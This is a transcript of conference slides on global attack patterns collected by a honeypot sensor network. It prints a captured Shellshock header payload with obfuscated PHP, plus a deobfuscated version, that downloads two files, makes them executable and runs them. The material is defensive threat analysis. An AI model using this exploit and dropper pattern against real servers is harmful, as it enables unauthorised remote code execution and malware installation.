Global attack patterns to improve threat detection

Global attack patterns to improve threat detection Curt Barnard, Software Implementation Engineer

Transcript of Global attack patterns to improve threat detection

Global attack patterns to improve threat detection Curt Barnard, Software Implementation Engineer

• Evolution of methods used in mass exploitation

• Adoption of these methods by malicious actors

• Adaptation of these actors to defensive measures

Key Takeaways

Crawlers, bots, and automated exploitation scripts crowd the internet

Up to 80% of all site traffic generated by bots [1]

Vulnerabilities in common, core programming libraries make juicy

targets for malicious actors


The internet is noisy

• Many malicious actors employ a “spray and pray”


• Recent examples: Heart bleed, Shellshock, weak SSH


• Commoditization of access is prevalent with non-targeted


How do you get warnings of attacks?

Endgame employs a SensorNet of dummy web services to collect at-scale attack data

– Multiple VPS providers

– Multiple geographic regions

– Multiple OS configurations

– Centralized logging

When hackers talk, we listen

Shellshock Attack

We have observed a bad actor executing:- An obfuscated php code - By leveraging a shellshock vulnerability- Via multiple client IP addresses

• Bash vulnerability related to variable assignment• Can stuff it in HTTP headers

() { :;} ; <commands>

Shellshock PrefixCommand sequence

How Shellshock is formatted?

() { :;} ;echo;/usr/local/bin/php -r '$a = "";''$b = "";''$c = sys_get_temp_dir();''$d = "AS1";''$e = "AS2";''$f = "chmod 777";''$g = "file_put_contents";''$h = "system";''$i = "file_exists";''$j = "fopen";''$k = "uptime";''if ($i($c . "/$d"))''{''exit(1);''}else{''$h("$k");''$g("$c/$d", $j("$a", "r"));''$g("$c/$e", $j("$b", "r"));''$h("$f " . $c ."/$d");''$h("$f " . $c ."/$e");''$h($c . "/$d");''$h($c . "/$e");''}'

Obfuscated php code

This code is unclear to confuse pattern matchers, but not very effective against humans

system("uptime");file_put_contents("AS1", fopen("", 'r'));file_put_contents("AS2", fopen("", 'r'));system("chmod 777 AS1");system("chmod 777 AS2");system("AS1");system("AS2");

Deobfuscated php code

This is the definition of spray and pray, where the bad actor hopes to get something by shotgun approach

• Attackers are indiscriminately targeting web services with


• They are using advanced techniques to prevent automated

detection of TTP’s

• Sophistication of these attacks have increased over time

• Several (likely compromised) sources using the same


The shocking summary

• Evolution of methods used in mass exploitation

• Adoption of these methods by malicious actors

• Adaptation of these actors to defensive measures

Key Takeaways

For more information contact: [email protected]